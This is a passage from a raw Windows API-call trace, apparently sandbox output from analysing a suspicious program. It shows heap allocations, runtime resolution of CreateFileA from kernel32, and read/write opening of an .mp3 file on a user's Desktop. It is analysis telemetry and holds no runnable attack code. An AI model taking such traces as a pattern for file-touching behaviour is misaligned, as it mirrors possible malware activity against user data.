Size=0x10) returned 0x88cb38 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.115] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.117] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8891f0 [0030.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8891f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.117] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0030.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891f0 [0030.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8891f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.118] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0030.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0030.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x34) returned 0x7c2080 [0030.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3", cchWideChar=52, lpMultiByteStr=0x7c2080, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3", lpUsedDefaultChar=0x0) returned 52 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.119] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxptuwejz.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=52, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x68) returned 0x7c10a8 [0030.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=52, lpWideCharStr=0x7c10a8, cchWideChar=52 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NXpTuweJZ.mp3") returned 52 [0030.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0030.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0030.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0030.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.121] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0030.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.122] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.122] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 